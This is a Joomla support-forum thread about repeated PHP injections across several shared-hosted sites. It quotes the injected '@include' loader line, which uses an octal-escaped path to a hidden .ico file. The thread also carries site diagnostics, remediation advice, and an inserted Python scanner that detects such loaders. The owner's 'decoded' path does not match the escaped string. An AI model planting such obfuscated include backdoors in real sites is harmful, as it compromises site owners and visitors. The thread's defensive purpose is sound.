I'm getting constant php injections
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
I'm getting constant php injections
Despite installing security pro and RSFirewall and cleaning all injected php files I'm getting the same sql injections into the PHP files like this (see attached):
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[youtube]-embed-plus/.484229fd.ico";
Does any of you know how we can block php injections?
I have same issue as this guy http://www.webhostingtalk.com/showthread.php?t=1642283
In server error log to find hole: too many errors of :
[08-May-2017 02:09:21 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
[11-May-2017 21:29:42 America/Chicago] PHP Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the php://input stream instead. in Unknown on line 0
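Added example (not part of the thread, and not code from RSFirewall or Securitycheck Pro): one way to find this kind of injected loader on disk is to decode the escaped path in each `include`/`require` and flag targets that are hidden or are not PHP files. The function names, the `SAMPLE` input (the line quoted above plus a constructed benign include) and the assumption that a disguised `.ico` payload contains a `<?php` tag are this example's own.

```python
import re
from pathlib import Path, PurePosixPath

# include/require of a double-quoted literal; a leading "@" suppresses PHP errors.
INCLUDE_RE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
# Escapes PHP resolves inside double quotes: \NNN (octal), \xHH (hex), \\ (backslash).
ESCAPE_RE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(\\))')
ICO_MAGIC = b"\x00\x00\x01\x00"  # first four bytes of a genuine .ico image

# The injected line quoted in the post, plus one constructed benign include.
SAMPLE = r'''<?php
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
require_once "includes/framework.php";
'''


def decode_php_string(literal):
    """Resolve octal/hex escapes the way PHP does in a double-quoted string."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 8) & 0xFF)
        if m.group(2):
            return chr(int(m.group(2), 16))
        return "\\"
    return ESCAPE_RE.sub(repl, literal)


def scan_php_source(source):
    """Flag includes whose path is escaped, hidden, or not a PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in INCLUDE_RE.finditer(line):
            raw = m.group(1)
            path = decode_php_string(raw)
            name = PurePosixPath(path).name
            reasons = []
            if any(e.group(1) or e.group(2) for e in ESCAPE_RE.finditer(raw)):
                reasons.append("escaped-path")
            if name.startswith("."):
                reasons.append("hidden-file")
            if PurePosixPath(name).suffix.lower() not in (".php", ".inc"):
                reasons.append("non-php-extension")
            if reasons:
                findings.append({"line": lineno, "path": path, "reasons": reasons})
    return findings


def is_disguised_php(data):
    """True when bytes stored as an icon lack the ICO header but contain PHP."""
    return not data.startswith(ICO_MAGIC) and b"<?php" in data.lower()


def scan_tree(root):
    """Scan .php files for suspicious includes and .ico files for PHP code."""
    report = {}
    for p in Path(root).rglob("*"):  # rglob also returns dot-files
        if not p.is_file():
            continue
        hits = []
        if p.suffix.lower() == ".php":
            hits = scan_php_source(p.read_text(errors="replace"))
        elif p.suffix.lower() == ".ico" and is_disguised_php(p.read_bytes()):
            hits = [{"line": 0, "path": str(p), "reasons": ["php-in-ico"]}]
        if hits:
            report[str(p)] = hits
    return report


if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE):
        print(finding)
```

Run `scan_tree()` over every site directory in the account, since a loader in one site can point at a payload stored under another.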
- Giraffex
- Joomla! Intern
- Posts: 74
- Joined: Fri Jan 21, 2011 3:51 pm
- Location: Guben
- Contact:
Re: I'm getting constant php injections
The best way to protect yourself is through the current Joomla system. But this will not help when poor quality components are installed on the website. Often they are the ones that cause hackers to break into websites.
- mandville
- Joomla! Master
- Posts: 15149
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: I'm getting constant php injections
Please run and post the results of the FPA
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 23
- Joined: Fri Feb 26, 2010 10:08 am
- Contact:
Re: I'm getting constant php injections
Have you tried a security component? Try to install RSFirewall and make a scan of your website.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
We tried to install RSFirewall, and it shows me the infected files.
We clean them, a week later they come back. We have a hosting with 10 sites with Joomla and one WP that are injected weekly.
- mandville
- Joomla! Master
- Posts: 15149
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: I'm getting constant php injections
as requested viewtopic.php?f=806&t=969442
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- Per Yngve Berg
- Joomla! Master
- Posts: 30769
- Joined: Mon Oct 27, 2008 9:27 pm
- Location: Romerike, Norway
Re: I'm getting constant php injections
Is this hosted on a VPS?
You have to isolate the sites by installing with a separate OS user for each site to prevent cross site contamination.
It also looks like the vulnerability is in the WP site.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
It's on shared hostgator account. VPS is too costly for 12 sites. They are all Joomla sites.
We tried WP to see if it helps but then WP php files got injected too.
I still get codes in PHP like this:
/9f961/
@include "\057ho\155e3\057al\163un\156a/\160ub\154ic\137ht\155l/\142ec\157me\155us\154im\057pl\165gi\156s/\146ie\154ds\057in\164eg\145r/\05670\14601\061c1\056ic\157";
/9f961/
When I decode this msg, it comes to injecting .ico file:
@include "/home/sneakers/public_html/wp-content/plugins/[[youtube]]-embed-plus/.484229fd.ico";
- Per Yngve Berg
- Joomla! Master
- Posts: 30769
- Joined: Mon Oct 27, 2008 9:27 pm
- Location: Romerike, Norway
Re: I'm getting constant php injections
We are still waiting for the FPA report as requested several times.
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
Forum Post Assistant (v1.4.8 (koine)) : 1st May 2019
Last PHP Error(s) Reported ::
[30-Apr-2019 17:02:10 America/Chicago] PHP Parse error: syntax error, unexpected end of file, expecting variable (T_VARIABLE) or '{' or '$' in /fpa-en.php on line 2327
Basic Environment ::
Joomla! Instance :: Joomla! 3.9.5-Stable (Amani) 9-April-2019
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) | Owner: --protected-- . (uid: 1/gid: 1) | Group: --protected-- (gid: 1) | Valid For: 3.9
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: true | .htaccess/web.config: Yes | GZip: true | Cache: false | CacheTime: 30 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: none | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.5: Yes | Database Supports J! 3.9.5: Yes | Database Credentials Present: Yes |
Host Configuration :: OS: Linux | OS Version: 3.10.0-693.17.1.2.ELK.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: --protected-- | System TMP Writable: Yes | Free Disk Space : 122.64 GiB |
PHP Configuration :: Version: 7.1.14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: error_log | Last Known Error: 30th April 2019 17:02:10. | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: /home3/alsunna/public_html:/tmp:/home3/alsunna/public_html/info/tmp:/home3/alsunna/public_html/info/logs | Uploads: 1 | Max. Upload Size: 64M | Max. POST Size: 64M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M
Database Configuration :: Version: 5.6.41-84.1 (Client:5.6.41-84.1) | Host: --protected-- (--protected--) | default Collation: utf8_general_ci (default Character Set: utf8) | Database Size: 201.67 MiB | #of Tables: 206
Detailed Environment ::
PHP Extensions :: Core (7.1.14) | date (7.1.14) | libxml (7.1.14) | openssl (7.1.14) | pcre (7.1.14) | sqlite3 (7.1.14) | zlib (7.1.14) | bcmath (7.1.14) | bz2 (7.1.14) | calendar (7.1.14) | ctype (7.1.14) | curl (7.1.14) | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (7.1.14) | ftp (7.1.14) | gd (7.1.14) | gettext (7.1.14) | gmp (7.1.14) | SPL (7.1.14) | iconv (7.1.14) | session (7.1.14) | intl (1.1.0) | json (1.5.0) | mbstring (7.1.14) | mcrypt (7.1.14) | mysqli (7.1.14) | odbc (7.1.14) | standard (7.1.14) | PDO (7.1.14) | pdo_mysql (7.1.14) | pdo_sqlite (7.1.14) | Phar (2.0.2) | posix (7.1.14) | pspell (7.1.14) | Reflection (7.1.14) | imap (7.1.14) | SimpleXML (7.1.14) | soap (7.1.14) | sockets (7.1.14) | exif (7.1.14) | tidy (7.1.14) | tokenizer (7.1.14) | wddx (7.1.14) | xml (7.1.14) | xmlreader (7.1.14) | xmlrpc (7.1.14) | xmlwriter (7.1.14) | xsl (7.1.14) | zip (1.13.5) | cgi-fcgi () | SourceGuardian (11.1.5) | ionCube Loader () | Zend Engine (3.1.0) |
Potential Missing Extensions ::
Disabled Functions :: system | shell_exec | passthru | exec | popen | proc_open |
Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (---) |
Elevated Permissions (First 10) ::
Database Information ::
Database statistics :: Uptime: 1844993 | Threads: 18 | Questions: 1689456911 | Slow queries: 22725 | Opens: 19266941 | Flush tables: 1 | Open tables: 16800 | Queries per second avg: 915.698 |
Extensions Discovered ::
Components :: SITE ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_FILESYSTEM_JOOMLA_TITLE (2.6.11) ? | WF_AGGREGATOR_VIMEO_TITLE (2.6.11) ? | WF_AGGREGATOR_[youtube]_TITLE (2.6.11) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.6.11) ? | WF_AGGREGATOR_VINE_TITLE (2.6.11) ? | WF_POPUPS_WINDOW_TITLE (2.6.11) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.6.11) ? | FLEXIcontent Links (2.3.0-rc) ? | WF_LINKS_JOOMLALINKS_TITLE (2.6.11) ? | WF_LINK_SEARCH_TITLE (2.6.11) ? | WF_CLEANUP_TITLE (2.6.11) ? | WF_LINK_TITLE (2.6.11) ? | WF_ANCHOR_TITLE (2.6.11) ? | WF_FULLSCREEN_TITLE (2.6.11) ? | WF_CHARMAP_TITLE (2.6.11) ? | WF_KITCHENSINK_TITLE (2.6.11) ? | WF_VISUALBLOCKS_TITLE (2.6.11) ? | WF_IMGMANAGER_TITLE (2.6.11) ? | WF_SEARCHREPLACE_TITLE (2.6.11) ? | WF_TEXTCASE_TITLE (2.6.11) ? | WF_HR_TITLE (2.6.11) ? | WF_FONTCOLOR_TITLE (2.6.11) ? | WF_VISUALCHARS_TITLE (2.6.11) ? | WF_NONBREAKING_TITLE (2.6.11) ? | WF_SOURCE_TITLE (2.6.11) ? | WF_INLINEPOPUPS_TITLE (2.6.11) ? | WF_CLIPBOARD_TITLE (2.6.11) ? | WF_SPELLCHECKER_TITLE (2.6.11) ? | WF_BROWSER_TITLE (2.6.11) ? | WF_CONTEXTMENU_TITLE (2.6.11) ? | WF_XHTMLXTRAS_TITLE (2.6.11) ? | WF_STYLESELECT_TITLE (2.6.11) ? | WF_TABLE_TITLE (2.6.11) ? | WF_DIRECTIONALITY_TITLE (2.6.11) ? | WF_PREVIEW_TITLE (2.6.11) ? | WF_EMOTIONS_TITLE (2.6.11) ? | WF_FONTSELECT_TITLE (2.6.11) ? | WF_LISTS_TITLE (2.6.11) ? | WF_MEDIA_TITLE (2.6.11) ? | WF_PRINT_TITLE (2.6.11) ? | WF_FORMATSELECT_TITLE (2.6.11) ? | WF_ARTICLE_TITLE (2.6.11) ? | WF_AUTOSAVE_TITLE (2.6.11) ? | WF_FONTSIZESELECT_TITLE (2.6.11) ? | WF_STYLE_TITLE (2.6.11) ? | WF_LAYER_TITLE (2.6.11) ? |
Components :: ADMIN ::
Core :: com_search (3.0.0) 1 | com_messages (3.0.0) 1 | com_contenthistory (3.2.0) 1 | com_postinstall (3.2.0) 1 | com_templates (3.0.0) 1 | com_modules (3.0.0) 1 | com_content (3.0.0) 1 | com_checkin (3.0.0) 1 | com_tags (3.1.0) 1 | com_users (3.0.0) 1 | com_admin (3.0.0) 1 | com_languages (3.0.0) 1 | com_media (3.0.0) 1 | com_ajax (3.2.0) 1 | com_categories (3.0.0) 1 | com_finder (3.0.0) 1 | com_fields (3.7.0) 1 | com_associations (3.7.0) 1 | com_config (3.0.0) 1 | com_newsfeeds (3.0.0) 1 | com_plugins (3.0.0) 1 | com_weblinks (3.5.0) 1 | com_cpanel (3.0.0) 1 | com_redirect (3.0.0) 1 | com_menus (3.0.0) 1 | com_banners (3.0.0) 1 | com_cache (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_installer (3.0.0) 1 | com_joomlaupdate (3.6.2) 1 | com_privacy (3.9.0) 1 | com_login (3.0.0) 1 |
3rd Party:: COM_JCE (2.6.11) 1 | Akeeba (6.4.2.1) 1 | COM_GANTRY (4.1.40) 1 | Securitycheck Pro (3.1.5) 1 | Facebook Recommendations bar (1.0) ? | Linkedin company profile (1.0) ? | Social share button (1.0) ? | Facebook Activity Feed (1.0) ? | Twitter feed (1.0) ? | Linkedin member profile (1.0) ? | Linkedin Build a Jobs (1.0) ? | Facebook Embedded Posts (1.0) ? | Facebook Commend (1.0) ? | Google Interactive posts (1.0) ? | Facebook Like Box (1.0) ? | Google Comment (1.0) ? | Linkedin Apply button (1.0) ? | Google Badge (1.0) ? | Facebook Recommendations box (1.0) ? | Linkedin company Insider (1.0) ? | Facebook Facepile (1.0) ? | Login button (1.0) ? | BT_SocialConnect (1.2.1) 1 | Facebook Profile (1.0) ? | Google page (1.0) ? | Facebook Page (1.0) ? | Linkedin Companies (1.0) ? | Facebook Groups (1.0) ? | Linkedin Groups (1.0) ? | Twitter Profile (1.0) ? | Linkedin Profile (1.0) ? | Mailing (1.0) ? | EasySlider (2.1.4) 0 | sh404SEF (4.4.4.1791) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_system_shlib (0.2.9.370) 1 | sh404sef - System plugin (4.4.4.1791) 1 | sh404sef - System mobile template s (4.4.4.1791) ? | sh404sef control panel icon (4.4.4.1791) 1 | com_jhackguard (2.0.2) 1 | RokSprocket (2.1.23) 1 | JMap (2.0.2) 1 | com_gantry5 (5.0.0-rc.1) 1 | COM_SPUPGRADE (4.1.1) 1 | Mailster (1.5.1) 1 | RSFirewall! (2.11.25) 1 | SP Simple Portfolio (1.3) ? | com_uniterevolution2 (4.3.8 b5) 1 | com_djimageslider (3.2.1) 1 | Bt_Portfolio (3.0.9) 1 | SP Page Builder (2.4.1) 1 |
Modules :: SITE ::
Core :: mod_tags_popular (3.1.0) 1 | mod_login (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_weblinks (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_articles_popular (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_related_items (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_banners (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_search (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 |
3rd Party:: BT Login (2.5.6) 1 | SP Simple Portfolio Module (1.3) ? | JSN EasySlider (2.1.4) 1 | BT Twitter Feeds (2.2) 1 | MOD_RANDOM_IMAGE_EXTENDED (3.3.0) 1 | BT Content Showcase (2.4.2) 1 | Hyper News Ticker (1.0) 1 | RokNavMenu (2.0.9) ? | ThemeHippo Pricing Table (1.0) 1 | CT Random Article (1.0.0) 1 | News Show SP2 (2.2) 1 | SP Page Builder (1.1) 1 | mod_news_pro_gk4 (GK4 3.4.0) 1 | BT Slideshow Pro (2.1.8) 1 | RokAjaxSearch (2.0.6) 1 | DJ-ImageSlider (3.2.1) 1 | Latest News + (2.1.3) 1 | Random Article (1.4.1.78) 1 | SP Facebook (1.4) 1 | BT Simple Slideshow (1.0.2) 1 | Custom Inline HTML (1.0) 1 | BT Google Maps (2.0.8) 1 | Mailster Subscriber (1.5.1) 1 | Hijri Date (1.0.1) 1 | Sj K2 Mega News (2.5) 1 | MOD_LATESTNEWSENHANCED (3.0.4) 1 | RokSprocket Module (2.1.6) ? | AP Smart LayerSlider (3.4) ? | SP Tweet (2.2.0) 1 | JA Image Hotspot (1.1.4) 1 |
Modules :: ADMIN ::
Core :: mod_title (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_sampledata (3.8.0) ? | mod_popular (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_version (3.0.0) 1 | mod_status (3.0.0) 1 |
3rd Party:: RSFirewall! Control Panel Module (1.4.0) 1 | sh404sef control panel icon (4.4.4.1791) 1 | mod_sppagebuilder_admin_menu (1.1) ? | mod_sppagebuilder_icons (1.0.2) ? | Securitycheck Pro Info Module (3.1.5) 1 |
Libraries :: SITE ::
Core ::
3rd Party:: RokCommon (3.2.0) 1 | file_fof30 (3.4.2) ? |
Plugins :: SITE ::
Core :: plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_color (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_privacy_user (3.9.0) 1 | plg_privacy_message (3.9.0) 1 | plg_privacy_actionlogs (3.9.0) 1 | plg_privacy_content (3.9.0) 1 | plg_privacy_consents (3.9.0) 1 | plg_user_profile (3.0.0) ? | plg_user_terms (3.9.0) 0 | plg_user_joomla (3.0.0) 1 | plg_user_contactcreator (3.0.0) ? | plg_twofactorauth_yubikey (3.2.0) 1 | plg_twofactorauth_totp (3.2.0) 1 | plg_authentication_gmail (3.0.0) ? | plg_authentication_ldap (3.0.0) ? | plg_authentication_cookie (3.0.0) 1 | plg_authentication_joomla (3.0.0) 1 | plg_extension_joomla (3.0.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_installer_webinstaller (2.0.1) 1 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_captcha_recaptcha (3.4.0) ? 
| plg_quickicon_privacycheck (3.9.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_finder_weblinks (3.5.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_editors-xtd_fields (3.7.0) 1 | plg_editors-xtd_image (3.0.0) 1 | plg_editors-xtd_menu (3.7.0) 1 | plg_editors-xtd_module (3.5.0) 1 | plg_editors-xtd_pagebreak (3.0.0) 1 | plg_editors-xtd_readmore (3.0.0) 1 | plg_editors-xtd_article (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_pagenavigation (3.0.0) 1 | plg_content_confirmconsent (3.9.0) 0 | plg_content_pagebreak (3.0.0) 1 | plg_content_emailcloak (3.0.0) 1 | plg_content_vote (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_finder (3.0.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_system_fields (3.7.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_debug (3.0.0) 1 | plg_system_p3p (3.0.0) 1 | plg_system_sef (3.0.0) 1 | plg_system_stats (3.5.0) ? | plg_system_log (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_highlight (3.0.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_cache (3.0.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_languagecode (3.0.0) ? | plg_system_privacyconsent (3.9.0) 0 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 0 | plg_system_logrotation (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_search_weblinks (3.5.0) 1 | plg_search_contacts (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_search_categories (3.0.0) 1 |
3rd Party:: RokPad (2.1.10) 1 | plg_editors_tinymce (4.5.9) 1 | plg_editors_jce (2.6.11) 1 | plg_editors_codemirror (5.40.0) 1 | BT AutoSubmit - Registration (1.0.0) 1 | plg_gantry5_preset (5.0.0-rc.1) 1 | plg_extension_jce (2.6.11) 1 | Extension - Inline editing Plugin H (1.0) ? | plg_installer_rsfirewall (1.0.0) 1 | plg_installer_jce (2.6.11) 1 | plg_installer_sh404sef (4.4.4.1791) 1 | Installer - Securitycheck Pro (3.1.5) 1 | Ajax - Inline content editing (1.0.2b) 1 | Ajax - Inline Mode State listener (1.0) 1 | Helix3 - Ajax (1.9) 1 | Ajax - TreeLink (1.0) 1 | sh404sef - Default component suppor (4.4.4.1791) ? | sh404sef - Offline code plugin (4.4.4.1791) 1 | sh404sef - Similar urls plugin (4.4.4.1791) 1 | PLG_SH404SEFCORE_SH404SEFSOCIAL (4.4.4.1791) 1 | sh404sef - Analytics plugin (4.4.4.1791) 1 | plg_quickicon_gantry5 (5.0.0-rc.1) 1 | plg_quickicon_jce (2.6.0-pro-bet) 1 | plg_quickicon_akeebabackup (6.4.2.1) 1 | Smart Search - mp3 Browser Fork (0.3.1) 1 | Editors-xtd - BT Shortcode (1.0.0) 1 | Button - RokBox (2.0.15) 1 | BT Widget - Button (1.0.0) 1 | JSN_EASYSLIDER_PLUGIN_BUTTON_TITLE (2.1.4) 0 | PLG_MP3BROWSER_SYS_NAME (0.3.1) 1 | Content - Inline content editing fi (1.0) ? | Content - Facebook Like And Share (5.5) 1 | Content - Rapid1Pixelout (3.5) 1 | Content - RokInjectModule (1.6) 1 | RokBox (2.0.15) 1 | Content - Inline content editing (1.0) 1 | plg_content_jce (2.6.11) 1 | JSN_EASYSLIDER_PLUGIN_CONTENT_TITLE (2.1.4) 0 | Mailster Subscriber (1.5.1) 1 | Content - BT Shortcode (1.0.0) 1 | BT AutoSubmit - Content (1.0.0) 1 | T3 Framework (2.7.4) 1 | System - Inline content editing (1.0) 1 | PLG_SYSTEM_AKEEBAACTIONLOG (6.4.2.1) 0 | JHackGuard Plugin (2.0.4) 1 | System - url Inspector (3.1.5) 0 | System - Securitycheck Pro Update D (1.0.2) ? | System - SP PageBuilder (1.1) ? 
| System - RokBox (2.0.15) 1 | System - RokCommon (3.2.5) 1 | System - Inline History (1.0) 1 | System - Reset SEF Base (3.0) 1 | plg_system_ef4_jmframework (4.8.4) 1 | plg_system_jmframework (3.12) 1 | System - RokExtender (2.0.0) ? | plg_system_gantry5 (5.0.0-rc.1) 1 | System - RokBooster (1.1.18) 0 | System - Securitycheck Pro (3.1.5) 1 | PLG_SYSTEM_BACKUPONUPDATE (6.4.2.1) 0 | plg_system_djjquerymonster (1.2.0) 1 | System - Joomla Media Manager Exten (1.0) ? | System - SP Page Builder Pro Update (1.0) ? | System - RokSprocket (2.1.6) 1 | manage.myJoomla.com Secure Plugin (n/a) ? | Mailster Email Forwarder (1.5.1) 1 | System - Helix3 Framework (1.9) 1 | System - RSFirewall! Active Scanner (1.4.0) 1 | plg_system_jce (2.6.11) 1 | System - Yjsg Framework (2.3.6) 1 | System - Securitycheck Pro Cron (3.1.5) 1 | plg_system_jsnframework (2.0.2) 1 | plg_system_shlib (0.2.9.370) 1 | PLG_SYSTEM_JCH_OPTIMIZE (5.0.5) ? | sh404sef - System plugin (4.4.4.1791) 1 | BT Social Connect - System (1.0.0) 1 | PLG_SYSTEM_JSNEASYSLIDER (2.1.4) 0 | System - Inline HTML Module Version (1.0) ? | PLG_SYSTEM_AKEEBAUPDATECHECK (6.4.2.1) 0 | sh404sef - System mobile template s (4.4.4.1791) ? | System - BT Shortcode (1.0.1) 1 | System - Gantry 4 (4.1.40) 1 | Mailster Profile (1.5.1) 1 | plg_search_sppagebuilder (1.2) ? |
Templates Discovered ::
Templates :: SITE :: Flex (2.4) 1 | jm-wedding06 (1.02) 1 | protostar (1.0) 1 | beez3 (3.1.0) ? | rt_callisto (1.0.0) 1 |
Templates :: ADMIN :: hathor (3.0.0) 1 | isis (1.0) 1 |
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
Please advise.
- Webdongle
- Joomla! Master
- Posts: 43979
- Joined: Sat Apr 05, 2008 9:58 pm
Re: I'm getting constant php injections
You have no real option except to delete your files and rebuild them. Please see viewtopic.php?f=714&t=946026
You have a lot of out of date extensions. Following the instructions of viewtopic.php?f=714&t=946026 (and the thread it links to) will clean your site and rebuild your files with fresh up to date ones. If you are unable to follow the instructions then perhaps consider professional help.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- darb
- Joomla! Hero
- Posts: 2035
- Joined: Thu Jul 06, 2006 12:57 pm
- Location: Stockholm Sweden
Re: I'm getting constant php injections
First you can also then check so you don't have a local trojan on your own computer infecting your ftp client because it seems it's an issue with two different kinds of cms sites and I don't believe you could have timing of getting this problem at same time with Hostgator on several cms sites.
Never heard that Wordpress can spread virus to Joomla by a same hoster
-
- Joomla! Intern
- Posts: 81
- Joined: Sat Nov 03, 2007 4:37 pm
Re: I'm getting constant php injections
We have several sites under that hosting; to delete all of them and re-install will take so much time and work. My question is: how do we block PHP injections? How do we prevent it after we clean it?
- Webdongle
- Joomla! Master
- Posts: 43979
- Joined: Sat Apr 05, 2008 9:58 pm
Re: I'm getting constant php injections
Yep a lot of work but you have little choice. Following the process viewtopic.php?f=714&t=946026 will remove the hack files and make sure your extensions are up to date and that you don't have vulnerable ones. You can start by performing it on the folders for the hacked site. That may be enough. But if you get hacked after that then you will need to do it for all the sites. Other than that hire a professional.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".